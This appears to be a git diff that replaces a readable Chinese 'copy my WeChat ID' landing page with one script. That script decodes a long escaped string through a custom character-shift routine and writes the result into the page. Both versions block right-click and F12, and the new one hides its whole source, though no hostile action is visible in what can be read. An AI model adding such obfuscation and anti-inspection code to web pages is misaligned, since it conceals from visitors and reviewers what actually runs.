--- a/index.html
+++ b/index.html
@@ -1,115 +1,1 @@
-<!DOCTYPE html>
-<html lang="zh-CN">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
-    <meta name="apple-touch-fullscreen" content="yes">
-    <meta name="apple-mobile-web-app-capable" content="yes">
-    <meta name="apple-mobile-web-app-status-bar-style" content="default">
-    <title>WeChat</title>
-    <link rel="icon" href="./favicon.ico">
-    <style>
-        body::before {
-            content: "";
-            position: absolute;
-            top: 0;
-            left: 0;
-            width: 100%;
-            height: 100%;
-            background-image: linear-gradient(145deg, #fdcbf1, #e6dee9, #a1c4fd, #a8edea, #d299c2);
-            background-size: 400% 400%; /* 提高背景缩放范围，增加变化幅度 */
-            z-index: -1;
-            transform: rotate(0deg);
-            animation: colorSpiral 12s ease-in-out infinite; /* 使用 ease-in-out 让动画更加自然 */
-        }
-
-        @keyframes colorSpiral {
-            0% { background-position: 0% 50%; }
-            25% { background-position: 50% 100%; }
-            50% { background-position: 100% 50%; }
-            75% { background-position: 50% 0%; }
-            100% { background-position: 0% 50%; }
-        }
-        .container {
-            position: absolute; /* 使容器可以相对于其正常位置进行定位 */
-            transform: translate(-50%, -50%); /* 水平和垂直居中容器 */
-            left: 50%; /* 从左边定位到50% */
-            top: 50%; /* 从上边定位到50% */
-            background-color: hsla(0, 0%, 100%, 0.4); 
-            backdrop-filter: blur(10px);
-            border-radius: 15px ;
-            min-width: 350px; /* 设置最小宽度 */
-            max-width: 400px;
-            display: flex; /* 使用Flexbox布局 */
-            flex-direction: column; /* 垂直排列子元素 */
-            align-items: center; /* 水平居中子元素 */
-            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
-        }
-        
-        img {
-            width: 90%;
-            height: 100%;
-            margin: 10px auto;
-            border-radius: 10px 
-        }
-        button {
-            border-radius: 28px; 
-            color: #ffffff; /* 按钮文本颜色 */
-            width: 70%; 
-            height: 36px; 
-            background: #44c767; 
-            border: solid #18ab29 1px;
-            text-decoration: none; 
-            font-size: 18px;
-            margin: 0px 0px 15px 0px; /* 上边距为0，右边距为12，下边距为14，左边距为1 */
-        }
-        button:hover {
-            background: linear-gradient(145deg, #50f000, #38b200);
-            transform: scale(1.05);
-        }
-        #weChatId {
-            font-size: 16px; /* 设置字体大小 */
-            color: rgb(2, 2, 2); /* 设置字体颜色 */
-            font-weight: bold;
-        }
-        #weChatId:hover {
-            color: red; /* 鼠标悬停时改变字体颜色 */
-        }
-    </style>
-</head>
-<body>
-    <div class="container">
-        <p><span id="weChatId"></span></p>
-        <button id="copyButton">复 制 微 信 号</button>
-        <img src="./images/biubiu.png" alt="微信二维码">
-    </div>
-
-    <script type="text/javascript">
-        const wId = "YYHH8022"; // 微信号
-        document.getElementById('weChatId').textContent = "微信号: "+wId;
-
-        async function copyAndRedirect() {
-            try {
-                await navigator.clipboard.writeText(wId);
-                window.location.href = 'weixin://dl'; // 跳转到微信应用
-            } catch (error) {
-                alert('复制失败, 请手动输入 ' + wId);
-            }
-        }
-
-        document.getElementById('copyButton').addEventListener('click', copyAndRedirect);
-
-        // 禁止右键菜单
-        document.addEventListener('contextmenu', function(e) {
-            e.preventDefault();
-        });
-
-        // 禁止 F12 打开开发者工具
-        document.addEventListener('keydown', function(e) {
-            if (e.key === 'F12' || e.keyCode === 123) {
-                e.preventDefault();
-            }
-        });
-    </script>
-</body>
-</html>
+<script>document.write(function(a){a=unescape(a);var c=String.fromCharCode(a.charCodeAt(0)-a.length);for(var i=1;i<a.length;i++){c+=String.fromCharCode(a.charCodeAt(i)-c.charCodeAt(i-1))}return c}("%u0F4A%5De%93%92%97%AD%A9%95e%88%DC%E1%D9%AAHF%A4%DC%E1%D9%8C%8C%CD%CF%D5%A4_%9C%E2%95p%91p%60HF%A4%CD%C6%C5%A2H*@@@%5C%A9%D2%D9%D5%81%83%CB%C9%D3%E5%D8%D9%B1_w%A9%9AseZ%60H*@@@%5C%A9%D2%D9%D5%81%8E%CF%CE%D2%A2_%98%DF%CE%DC%E7%DF%E1%E6%96B%83%D2%DD%E2%D9%D3%E2%B1_%99%E0%CD%D8%DC%A5%A1%C9%DB%DF%CC%C8%92%A4%E0%CD%D8%DC%94L%89%D7%D7%DD%DD%CA%CD%99%A0%D6%C4%CD%D1%A2n_%5E%5CL%8D%D6%D7%D7%D6%E2%E2%9A%A0%D6%C4%CD%D1%A2n_%5E%5CL%8D%CE%D9%E1%D6%E2%E2%9A%A0%D6%C4%CD%D1%A2n_%5E%5CL%95%E8%D8%D7%9F%A0%D6%C4%CD%CD%C3%CE%D1%A2%AB%DD%91%60H*@@@%5C%A9%D2%D9%D5%81%8E%CF%CE%D2%A2_%83%D1%E0%DC%D1%92%A1%E3%E4%D8%CB%95%93%DB%E1%D8%DF%D6%D5%D7%CA%D3%90B%83%D2%DD%E2%D9%D3%E2%B1_%9B%DE%D8%95%60H*@@@%5C%A9%D2%D9%D5%81%8E%CF%CE%D2%A2_%83%D1%E0%DC%D1%92%9A%DC%D1%CB%D5%D1%92%A4%DC%C7%8F%8E%D1%E0%9D%90%C4%D1%D1%C3%CE%D1%87B%83%D2%DD%E2%D9%D3%E2%B1_%9B%DE%D8%95%60H*@@@%5C%A9%D2%D9%D5%81%8E%CF%CE%D2%A2_%83%D1%E0%DC%D1%92%9A%DC%D1%CB%D5%D1%92%A4%DC%C7%8F%8E%D1%E0%9D%A0%E7%D5%D5%E9%E8%A0%8F%C3%D3%9F%A0%E7%ED%E5%D1%87B%83%D2%DD%E2%D9%D3%E2%B1_%86%C9%CB%C7%D6%E1%E0%96%60H*@@@%5C%B0%DD%DD%E0%D1%A3%95%BC%A8%AB%C9%D5%B0k%A3%DD%DD%E0%D1%A3H*@@@%5C%A8%D5%D7%D9%8B%92%D7%D1%A9_%8B%CC%D2%DD%90B%88%DA%D7%CB%A3_P%5D%95%C7%D7%DF%CC%D2%DD%9C%97%CC%D2%91%60H*@@@%5C%AF%E7%ED%E5%D1%A3H*@@@@@@@%82%D1%D3%DD%B3t%9C%C7%CB%D5%E1%D7%85%9B%85*@@@@@@@@@@@%83%D2%DD%E2%D9%D3%E2%AEZBD%5DE*@@@@@@@@@@@%90%DF%E2%DC%DD%DD%D8%DD%A8Z%81%C3%D5%E2%DB%E1%E9%D9%A0E*@@@@@@@@@@@%94%E3%DF%AAZPkE*@@@@@@@@@@@%8C%D1%CB%DA%AEZPkE*@@@@@@@@@@@%97%E0%CD%D8%DC%A2ZQa%60U%60E*@@@@@@@@@@@%88%CD%CE%D0%CF%DC%AEZQa%60U%60E*@@@@@@@@@@@%82%C3%C4%CE%D2%D9%E1%E4%E3%D2%91%96%D6%CE%C8%CC%9FZ%8C%D5%D7%D3%C6%D3%9F%94%D9%D3%C5%CD%CE%D3%E2%9CYei%99%C9%CC%93LC%89%CA%C7%C5%C8%97%5DLC%88%9B%9A%C9%CA%9EeLC%84%92%94%97%9A%CA%90LC%84%99%9D%C9%C9%C6%8DLC%87%96kr%9C%95%5BdE*@@@@@@@@@@@%82%C3%C4%CE%D2%D9%E1%E4%E3%D2%91%A0%DC%E3%DF%9FZTd%60UETd%60U%60%5BOYJ%u63F0%uFEA8%u1BA4%uE73B%uE598%uE467%uE841%uD9F7%u5600%u57AA%uAB3E%uA678%uA6EE%uB15B%uBCEB%u5EC6JY9*@@@@@@@@@@@%9A%A7%96%D7%D2%C9%DD%B2ZM%5ElE*@@@@@@@@@@@%94%E6%D3%CF%E1%D9%D5%E1%DF%A7Z%92%E1%E3%D5%D5%D9%8DX%94%C9%CC%90dE*@@@@@@@@@@@%81%CF%D7%D6%CE%D5%DD%D8%DD%A8Z%83%D2%DB%DB%E1%C5%C3%D9%DB%D3%CD%8CQc%A5%93%85%C6%D4%D8%92%96%D7%9B%9C%E4%E9%94%89%D7%D4%CF%D7%D7%DD%D9%A0%5BOYJ%u4F9F%uC4A7%u7548%85%C6%D4%D8%92%96%D7%9B%9C%E4%E9%94%u8BC9%uDE51%uC7E3%uDC2F%uB994%uD48A%uF320%u7156JY9*@@@@@@@%9D%87%14*@@@@@@@%60%AB%D0%DE%DF%D8%D3%CE%D2%D8%93%83%D2%DB%DB%E1%C5%C3%D9%DB%D3%CD%8C%9B%85*@@@@@@@@@@@PUE%9B%9B%82%C3%C4%CE%D2%D9%E1%E4%E3%D2%91%9D%DF%E2%DC%DD%DD%D8%DD%A8ZPUEUeU%60%5B%9D%87*@@@@@@@@@@@RgZE%9B%9B%82%C3%C4%CE%D2%D9%E1%E4%E3%D2%91%9D%DF%E2%DC%DD%DD%D8%DD%A8ZUeUEQa%60U%60%5B%9D%87*@@@@@@@@@@@UeUE%9B%9B%82%C3%C4%CE%D2%D9%E1%E4%E3%D2%91%9D%DF%E2%DC%DD%DD%D8%DD%A8ZQa%60UEUeU%60%5B%9D%87*@@@@@@@@@@@WlZE%9B%9B%82%C3%C4%CE%D2%D9%E1%E4%E3%D2%91%9D%DF%E2%DC%DD%DD%D8%DD%A8ZUeUEPU%60%5B%9D%87*@@@@@@@@@@@Qa%60UE%9B%9B%82%C3%C4%CE%D2%D9%E1%E4%E3%D2%91%9D%DF%E2%DC%DD%DD%D8%DD%A8ZPUEUeU%60%5B%9D%87*@@@@@@@%9D%87*@@@@@@@N%91%D2%DD%E2%D5%CA%D7%D3%D7%92%9B%85*@@@@@@@@@@@%90%DF%E2%DC%DD%DD%D8%DD%A8Z%81%C3%D5%E2%DB%E1%E9%D9%A0%5BOYJ%u4F9F%uAB38%uB221%uAA57%uA2D4%uC5DD%uD2F1%uAA87%uA004%uBCD9%uC99B%uAD85%uCEBB%u0F49%u1827%uE3E6%uAAE7%u4F6DJY9*@@@@@@@@@@@%94%E6%D3%CF%E1%D9%D5%E1%DF%A7Z%94%E6%D3%CF%E1%DF%CD%D5%D9%8DUbeUQLMbeUNd%5BOYJ%u6C54%uCAA7%uB2FF%uAC0E%uCE76%uD339%uAA72%uA9E6%uB221%u5688JY9*@@@@@@@@@@@%8C%D1%CB%DA%AEZUeU%60%5BOYJ%u4EEE%uACB4%uED9F%uEB53%uAAE7%uA17D%u5265eUEJY9*@@@@@@@@@@@%94%E3%DF%AAZUeU%60%5BOYJ%u4EEE%u9CD8%uDDC3%uEB53%uAAE7%uA17D%u5265eUEJY9*@@@@@@@@@@@%82%C3%C4%CE%D2%D9%E1%E4%E3%D2%91%90%D2%DB%DB%E1%ACZ%88%DB%DF%CD%89X%5CLPUQLQa%60UQLP%5Eb%5Dd%5B**@@@@@@@@@@@%82%C3%C4%CE%CF%D6%E1%DF%9D%93%CF%D5%E0%D9%D7%ACZ%82%CE%E1%E7%9AYa%A0%E8%A1dE*@@@@@@@@@@@%82%D1%E1%D6%C9%D7%9F%9F%D3%C5%CD%DE%E8%ADZQf%A5%E8%98%5BE*@@@@@@@@@@@%8D%D6%D7%9B%A4%E0%CD%D8%DC%A2ZShe%A0%E8%B3%5BOYJ%u8BDE%u0B2C%uE66E%uC30F%uB7CC%uBA63%u5EC6JY9*@@@@@@@@@@@%8D%CE%D9%A5%A4%E0%CD%D8%DC%A2ZTd%60%A0%E8%B3E*@@@@@@@@@@@%84%CD%DC%E3%DC%CD%DA%B3Z%86%D2%D1%DD%B3%5BOYJ%u4F9F%uC4A7%u756E%B2%D1%DD%DA%D1%E7%u5E7B%uBA43%u5C60JY9*@@@@@@@@@@@%86%D2%D1%DD%A5%91%CD%DB%D7%C8%D7%DD%D8%DD%A8Z%83%D2%DB%E1%E2%DB%A9%5BOYJ%u57A2%uCE76%uDA86%uB5A9%uAD67%uAC93%uCE63%u7D40JY9*@@@@@@@@@@@%81%CD%D5%D0%D5%9B%96%DD%D9%D2%E0%ADZ%83%C8%D3%E2%D9%D7%AD%5BOYJ%u6C54%uCAA7%uBAB8%uAA72%uA97D%uAC93%uCE63%u7D40JY9*@@@@@@@@@@@%82%D1%E7%A5%A0%DB%C9%C5%D3%E6%B1ZPPT%A4%E8%98Qa%A0%E8%98%92%D9%C9%C3%89X%5CLP%5CLP%5CLP%5E_ZdE*@@@@@@@%9D%87*@@@@@@@**@@@@@@@%89%D6%D4%87%9B%85*@@@@@@@@@@@%97%E0%CD%D8%DC%A2ZYiU%60E*@@@@@@@@@@@%88%CD%CE%D0%CF%DC%AEZQa%60U%60E*@@@@@@@@@@@%8D%CE%D3%D9%D0%D7%A8ZQa%A0%E8%98%81%D6%E9%E3%AAE*@@@@@@@@@@@%82%D1%E1%D6%C9%D7%9F%9F%D3%C5%CD%DE%E8%ADZQa%A0%E8%98**@@@@@@@%9D%87*@@@@@@@%82%D7%E9%E8%E3%DD%8E%9B%85*@@@@@@@@@@@%82%D1%E1%D6%C9%D7%9F%9F%D3%C5%CD%DE%E8%ADZRj%A8%E8%B3%5B**@@@@@@@@@@@%83%D2%DB%DB%E1%ACZC%89%CC%CC%CC%CC%CC%A1%5BOYJ%u6329%uF7B7%uFA35%uCCB3%uFFC8%u1B0E%u8292JY9*@@@@@@@@@@@%97%E0%CD%D8%DC%A2ZWgU%60%5B**@@@@@@@@@@@%88%CD%CE%D0%CF%DC%AEZSi%A6%E8%B3%5B**@@@@@@@@@@@%82%C3%C4%CE%D2%D9%E1%E4%E3%D2%9EZCWh%97%9Ammr%5B**@@@@@@@@@@@%82%D1%E1%D6%C9%D7%ACZ%93%E2%DB%D5%CD%84CTi%99%C3%94kYQ%A1%E8%B3E*@@@@@@@@@@@%94%D9%DD%EC%A1%91%C9%C8%D2%E1%D3%D5%DD%D8%DD%A8Z%8E%DD%DD%D3%A0%5B**@@@@@@@@@@@%86%D5%DD%E2%A1%A0%DC%E3%DF%9FZQi%A8%E8%B3E*@@@@@@@@@@@%8D%CE%D3%D9%D0%D7%A8ZP%A0%E8%98P%A0%E8%98Qf%A5%E8%98P%A0%E8%B3%5BOYJ%u4E2A%uDDC3%u1D96%uDC17%u4E6A%uFF3C%u52FF%uE3AC%u1D96%uDC17%u4E6Bc%uFF3E%u4D17%uDDC4%u1D96%uDC17%u4E6Be%uFF40%u5CF2%uED9F%u1D96%uDC17%u4E6BQJY9*@@@@@@@%9D%87*@@@@@@@%82%D7%E9%E8%E3%DD%A8%A2%D7%E5%DB%D7%92%9B%85*@@@@@@@@@@@%82%C3%C4%CE%D2%D9%E1%E4%E3%D2%9EZ%8C%D5%D7%D3%C6%D3%9F%94%D9%D3%C5%CD%CE%D3%E2%9CYei%99%C9%CC%93LCXe%96%96%60%60%5CLCVk%9A%94b%60YdE*@@@@@@@@@@@%94%E6%D3%CF%E1%D9%D5%E1%DF%A7Z%93%D6%C4%CD%D1%8DY_%5Ee%5EdE*@@@@@@@%9D%87*@@@@@@@C%9A%DC%A8%AB%C9%D5%BD%AD%84%9B%85*@@@@@@@@@@@%86%D5%DD%E2%A1%A0%DC%E3%DF%9FZQg%A6%E8%B3%5BOYJ%u8BDE%u0B2C%uDAC5%uAAAA%uA87A%uB536%u5C2FJY9*@@@@@@@@@@@%83%D2%DB%DB%E1%ACZ%92%D9%C9%8AZ%5ELR%5ELR%5Bd%5BOYJ%u8BDE%u0B2C%uDAC5%uAAAA%uE7EF%u1B0E%u8292JY9*@@@@@@@@@@@%86%D5%DD%E2%A1%A4%DC%CE%D0%CF%DC%AEZ%82%D1%DB%D0%9FE*@@@@@@@%9D%87*@@@@@@@C%9A%DC%A8%AB%C9%D5%BD%AD%9E%A2%D7%E5%DB%D7%92%9B%85*@@@@@@@@@@@%83%D2%DB%DB%E1%ACZ%92%D7%C9%9F%5BOYJ%u9F40%u0727%uC8B3%uB108%uB652%uCB2F%uB911%uAF2F%uAAAA%uE7EF%u1B0E%u8292JY9*@@@@@@@%9D%87*@@@%5Ck%A2%E7%ED%E5%D1%A3HFk%97%CD%C6%C5%A2HF%9E%D1%D3%DD%B7H*@@@%5C%A0%CD%DF%96%83%CF%CD%D4%E6%B0_%85%D2%DD%E2%D5%CA%D7%D3%D7%94%60H*@@@@@@@%5C%AC%AEz%AF%E3%D1%CF%8E%89%CD%A1_%99%DC%A8%AB%C9%D5%BD%AD%86%60zk%A2%E3%D1%CF%ACzk%9F%AEH*@@@@@@@%5C%9E%D7%E9%E8%E3%DD%8E%89%CD%A1_%85%D2%DF%E9%BB%B7%E9%E8%E3%DD%90%60%u594B%u592D%u5256%u5256%u5FCE%u5FCE%u5001%u5001%u5417%u5433k%91%D7%E9%E8%E3%DD%ACH*@@@@@@@%5C%A5%D6%D4%87%93%E5%D5%A0_P%5D%98%D6%CE%C8%CC%D8%A2%91%CB%DE%D7%CB%DE%A3%9E%DE%D5%89B%81%CD%E0%B1_%u5FD0%uAF8F%u9E6D%uCD80%uF6F5%u7823%60H*@@@%5Ck%93%CD%DF%B4H%14*@@@%5C%AF%D6%D5%DB%D9%E4%94%94%ED%E9%D5%A2_%96%D9%DD%EC%A3%99%CB%D7%D7%D4%D6%D5%DB%D9%E4%96%60H*@@@@@@@%83%D2%DD%E1%E7%94%97%C0%AD%84%5D%5DB%7B%B2%A1%90%80hbdT%5D%5BO%5EO%u5FCE%uAF8F%uA3D8%u5401*@@@@@@@%84%D3%D2%D8%E2%D2%D3%E2%A2%95%CC%D9%B9%B1%D1%D2%D2%D3%E2%B6%BB%C2%AD%8CO%9E%DC%A8%AB%C9%D5%BD%AD%8BPW%A2%D9%DD%EC%B7%B2%DD%E2%D9%D3%E2%94%5D%5DB%u5FD0%uAF8F%uA3D8%u5431ZBM%A2%C0%AD%9FE%14*@@@@@@@%81%D4%EC%E7%D1%83%86%DB%E3%D1%D7%DD%D8%DD%8E%83%D2%DF%E9%BA%AF%D2%B6%B7%C9%CD%DB%D7%C8%D7%9CQI%9B%85*@@@@@@@@@@@%94%E6%EB%99%9B%85*@@@@@@@@@@@@@@@%81%D8%D8%CA%DD%94%8E%CF%D7%DF%D0%C8%D5%E3%E1%A0%91%CF%D5%D9%D2%D1%D0%D3%D6%92%A5%E9%DB%DD%D9%B9%B9%DD%EC%9C%9F%C0%AD%8DdE*@@@@@@@@@@@@@@@%97%E0%D7%D2%D3%E6%A5%9A%DB%D2%C4%D5%DD%D8%DD%9C%96%DA%D7%CB%86%5D%5DG%9E%DC%CE%E1%E1%D7%A8i%5E%93%D0%93b%5BO%5EO%u8E13%u1D5F%uE19C%uB1DE%uAF8F%uAE75%uD3BC%u7532*@@@@@@@@@@@%9D%9D%83%C4%D5%D7%CB%88H%8D%D7%E4%E1%E1%9BI%9B%85*@@@@@@@@@@@@@@@%81%CD%D1%D7%E6%9CO%u5934%uAB43%uAB67%uE656%u8D51L%u8C17%uEE42%uB4F3%uE23B%uE0F8%u5185GGKK%97%C0%AD%8DdE*@@@@@@@@@@@%9D%87*@@@@@@@%9D%87%14*@@@@@@@%84%D3%D2%D8%E2%D2%D3%E2%A2%95%CC%D9%B9%B1%D1%D2%D2%D3%E2%B6%BB%C2%AD%8CO%8A%D2%DF%E9%BB%B7%E9%E8%E3%DD%95PW%8F%C5%C8%A9%BB%DB%D3%E2%C0%B5%DC%E7%D9%D3%D3%D7%9AO%8A%CF%D5%CC%CE%92SL%83%D2%DF%E9%BA%AF%D2%B6%B7%C9%CD%DB%D7%C8%D7%9DdE%14*@@@@@@@O%5EO%u79A1%uE4E3%uBF55%uE921%u190A%uD731%u535F*@@@@@@@%84%D3%D2%D8%E2%D2%D3%E2%A2%8F%C5%C8%A9%BB%DB%D3%E2%C0%B5%DC%E7%D9%D3%D3%D7%9AO%8A%D2%DD%E2%D9%DD%EC%E1%D2%D3%E3%9CSL%86%DB%E3%D1%D7%DD%D8%DD%96%8D%8EI%9B%85*@@@@@@@@@@@%85%93%9E%E2%D7%DB%DB%D3%E2%B8%A9%CB%C7%D6%E1%E0%9CQdE*@@@@@@@%9D%A6dE%14*@@@@@@@O%5EO%u79A1%uE4E3%u6B82fwcR%u6273%uC153%uBE00%uB2D1%uD3D6%uDDEA%uAF5C%u5181*@@@@@@@%84%D3%D2%D8%E2%D2%D3%E2%A2%8F%C5%C8%A9%BB%DB%D3%E2%C0%B5%DC%E7%D9%D3%D3%D7%9AO%92%D0%DE%DD%D3%E6%E5%95SL%86%DB%E3%D1%D7%DD%D8%DD%96%8D%8EI%9B%85*@@@@@@@@@@@%89%CF%86H%8D%93%99%D0%DE%99%5Dzz%5DGmwcYG%9C%F8%9C%85%93%99%D0%DE%BC%B2%D3%C9%85%5Dzz%5DQce%5CI%9B%85*@@@@@@@@@@@@@@@%85%93%9E%E2%D7%DB%DB%D3%E2%B8%A9%CB%C7%D6%E1%E0%9CQdE*@@@@@@@@@@@%9D%87*@@@@@@@%9D%A6dE*@@@%5Ck%A2%D6%D5%DB%D9%E4%B2HFk%91%D1%D3%DD%B7HFk%97%DC%E1%D9%AAH"));</script>
